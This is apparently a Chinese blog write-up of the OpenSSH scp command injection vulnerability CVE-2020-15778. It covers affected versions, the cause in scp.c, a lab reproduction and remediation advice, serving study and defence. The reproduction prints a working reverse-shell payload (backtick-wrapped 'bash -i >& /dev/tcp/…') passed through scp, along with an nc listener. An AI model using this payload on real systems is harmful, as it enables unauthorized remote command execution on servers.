OpenSSH命令注入漏洞(CVE-2020-15778)

已于 2023-02-28 15:30:11 修改
阅读量2.1w 收藏 38
点赞数 17
分类专栏: 网络安全 文章标签: ssh linux 安全 web安全
于 2022-02-09 08:15:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42947816/article/details/122807007
版权

​1、漏洞描述

OpenSSH是SSH(Secure SHell)协议的免费开源实现。OpenSSH是个SSH的软件,Linux/Unix都用OpenSSH软件提供SSH服务。SCP是 Secure Copy 的缩写, SCP 是 Linux系统下基于SSH登陆进行安全的远程文件拷贝命令。

允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。

利用条件:知道目标的ssh密码。

漏洞利用场景:一般在特定环境下利用,比如在知道SSH账户密码后,但禁用SSH登陆或SSH连接被阻止,服务器允许使用scp传文件的情况下,可对其进行命令注入,所以如果攻击者不知道ssh账密,此漏洞无法利用。

2、影响版本及严重程度

OpenSSH <= 8.3p1

严重程序:高危

3、漏洞简单分析

3.1 使用scp复制文件到远程服务器时,在scp命令后面跟上文件的路径,具体格式如下:

scp [文件名] [用户名]@[远程主机]:[目录]/[文件名]

示例:scp 123.txt root@192.168.233.134:root/123.txt

3.2 在执行上述命令后,scp会使用”-t“参数来获取存储传入文件的路径,如下:

scp -t [目录]/[文件名]

问题出在下图的"scp.c"文件的988行,未对传入的文件路径进行检测防护,攻击者可以使用反引号包裹payload然后加上文件名执行scp命令,这时payload将会发送到远程服务器并执行。

4、漏洞复现

攻击源Kali:192.168.233.131

目标靶场Centos8:192.168.233.134

4.1 执行SCP命令执行,反弹shell

scp [上传任意文件] root@192.168.233.134:'`bash -i >& /dev/tcp/192.168.233.131/9999 0>&1`'

4.2 kali机器监听9999端口

nc -lvp 9999

4.3 反弹成功

5、修复方式

5.1 SSH账密确保为强口令且周期性更换密码

5.2 使用rsync代替SCP

5.3 升级OpenSSH为最新版openssh-8.8p1.tar.gz  

下载链接:https://cdn.openbsd.org/pub/OpenBSD/OpenSSH/portable/

参考链接:

https://www.safedog.cn/news.html?id=4500

https://www.cnblogs.com/ch4nge/p/13867062.html

https://blog.csdn.net/zetion_3/article/details/116053470

https://blog.csdn.net/qq_41901122/article/details/114437422

OpenSSH命令注入漏洞复现(CVE-2020-15778
千寻的博客
03-06 1万+
漏洞名称 OpenSSH命令注入漏洞 漏洞编号 CVE-2020-15778 漏洞描述 OpenSSH8.3p1及之前版本中scp的scp.c文件存在操作系统命令注入漏洞。 该漏洞即使在禁用ssh登录的情况下,但是允许使用scp传文件,而且远程服务器允许使用反引号(`)。 攻击者可利用scp复制文件到远程服务器时,执行带有payload的scp命令,从而在后续利用中getshell。 OpenSSH简介 OpenSSHSSH(Secure SHell) 协议的免费开源实现。
OpenSSH 命令注入漏洞(CVE-2020-15778)
gjgj的博客
06-18 9401
OpenSSH命令注入漏洞复现 1、简介 OpenSSHSSH (Secure SHell) 协议的免费开源实现,ssh主要就是用来远程控制计算机,或传输文件,OpenSSH是使用SSH透过计算机网络加密通讯的实现。 2、漏洞概述 该漏洞是存在于scp在拷贝文件时产生的一个代码注入漏洞,攻击者可以利用此漏洞执行任意命令,比如:反弹shell, 3、影响版本 openssh <= openssh-8.3p1 1 4、实验环境 首先下载openssh,版本要符合漏洞影响的版本 服务端:apt-g
CVE-2020-15778 OpenSSH命令注入漏洞
qq_48257021的博客
03-26 1344
OpenSSHSSH(Secure SHell) 协议的免费开源实现。SSH协议族可以用来进行远程控制,或在计算机之间传送文件。而实现此功能的传统方式,如telnet(终端仿真协议)、rcpftp、rlogin、rsh都是极为不安全的,并且会使用明文传送密码。OpenSSH提供了服务端后台程序和客户端工具,用来加密远程控制和文件传输过程中的数据,并由此来代替原来的类似服务。
OpenSSH 安全漏洞(CVE-2023-38408)
最新发布
love_lingling的博客
04-10 640
【代码】OpenSSH 安全漏洞(CVE-2023-38408)
[ 漏洞复现篇 ] OpenSSH 命令注入漏洞 (CVE-2020-15778)
qq_51577576的博客
08-05 3428
Linux scp 命令用于 Linux 之间复制文件和目录。scp 是 secure copy 的缩写, scp 是 linux 系统下基于 ssh 登陆进行安全的远程文件拷贝命令。scp 是加密的,rcp 是不加密的,scp 是 rcp 的加强版。该漏洞虽然利用很简单,但漏洞危害很大,漏洞等级也属于严重。利用需要知道ssh密码,在测试过程中通常可以配合ssh弱口令一起使用,或者在得知ssh密码的情况下进行使用,这样就可进行反弹shell获取权限了。...
LinuxOpenSSH 命令注入漏洞(CVE-2020-15778)(iptables屏蔽22端口方式)
实施工程师从入门到放弃
11-29 2784
操作过程中要边操作边验证,切记不要关闭已打开的窗口,保持开启,即使操作错误了,这个窗口也不会自动断开,还可以自行修复,否则就无法连接,直接找人吧。这就没辙了,只能限制服务器端口访问了,但是服务器不是我方管的,只能审慎执行命令,不然登不上去了还得找别人给帮忙处理。这个命令就是删除iptables -L列出的命令,后面数字为L列出来的顺序,建议从下往上删,绿盟扫出来的漏洞,但是禁用scp漏洞复扫还是有这个漏洞,查询版本SSH版本也是没问题的。验证1022端口是否可连接,可以的话回到上一步。
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
CVE-2020-15778漏洞-——快速升级——openssh8.6.p1.tar.gz
06-21
OpenSSH 命令注入漏洞(CVE-2020-15778),文件包含installs.sh、openssh-8.6p1.tar.gz、openssl-1.1.1k.tar.gz、zlib-1.2.11.tar.gz。升级时候将openssh.tar.gz放至/home下解压,进入openssh目录,执行chmod +x ...
OpenSSH 命令注入漏洞(CVE-2020-15778)修复
u013259937的博客
04-27 4094
OpenSSH 命令注入漏洞(CVE-2020-15778)修复 详细描述: OpenSSH(OpenBSD Secure Shell)是OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH 8.4p1及之前版本中的scp的scp.c文件存在命令注入漏洞。该漏洞源于外部输入数据构造可执行命令过程中,网络系统或产品未正确过滤其中的特殊元素。攻击者可利用该漏洞执行非法命令。 解决办法:
修复低版本漏洞OpenSSH 操作系统命令注入漏洞CVE-2020-15778
qq_18846873的博客
12-18 1151
本次描述的修复方式只适用于应付检查,并不是真正修复,如果真正修复,需要将OpenSSH组件升级到官方最新版本。 查看当前的版本:ssh -V 把脚本中的7.4换成上面查询的结果 #!/bin/bash os=`cat /etc/os-release|grep ID|grep -v VERSION_ID` ssh_status=`systemctl status sshd` if [[ $os =~ "centos" ]];then ssh=`strings /usr/bin/ssh|gre
CVE-2020-15778_OpenSSH命令注入
简单安全
03-25 932
2020年6月9日,研究人员Chinmay Pandya在Openssh中发现了一个漏洞,于7月18日公开。OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。该漏洞属于命令执行漏洞,目前绝大多数linux系统受影响。
2024年Linux CentOS 环境下安装JDK的三种方法(2),2024年最新农民工看完都学会了
2401_83947434的博客
05-03 1309
为了做好运维面试路上的助攻手,特整理了上百道,让你面试不慌心不跳,高薪offer怀里抱!这次整理的面试题,本份面试集锦涵盖了1、什么是运维?2、在工作中,运维人员经常需要跟运营人员打交道,请问运营人员是做什么工作的?3、现在给你三百台服务器,你怎么对他们进行管理?4、简述raid0 raid1raid5二种工作模式的工作原理及特点5、LVS、Nginx、HAproxy有什么区别?工作中你怎么选择?6、Squid、Varinsh和Nginx有什么区别,工作中你怎么选择?
openssh 命令注入CVE-2020-15778
weixin_68177269的博客
09-09 1021
协议进行远程登录的一个开源实现。通过对交互的流量进行加密防止窃听,连接劫持以及其他攻击。远程功能中注入命令,攻击者可利用该漏洞执行任意命令。样式的许可证提供,且已被集成到许多商业产品中。,只能进行文件上传和下载。这个条件比较苛刻,需要用户自己打开后门。项目的一些开发人员开发,首先在本地编写好反联后门。意思是复制当前目录下的。
OpenSSH 命令注入漏洞(CVE-2024-15778)修复教程_openssh_8
芯_v_648374雨馨博客
04-18 912
2021年来,云主机进行了漏洞扫描,出现了大量openssh漏洞,我尝试升级过8.4、8.5的版本。16、mysql的innodb如何定位锁问题,mysql如何减少主从复制延迟?2、在工作中,运维人员经常需要跟运营人员打交道,请问运营人员是做什么工作的?6、Squid、Varinsh和Nginx有什么区别,工作中你怎么选择?5、LVS、Nginx、HAproxy有什么区别?9、讲述一下Tomcat8005、8009、8080三个端口的含义?7、Tomcat和Resin有什么区别,工作中你怎么选择?
OpenSSH漏洞CVE-2020-15778升级指南及防范措施
资源摘要信息:"CVE-2020-15778是一个关于OpenSSH软件的命令注入漏洞OpenSSH是一个广泛使用的开源软件包,它实现了SSH(Secure Shell)协议,提供安全的网络服务和数据传输,包括远程登录、文件传输和其他网络服务...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值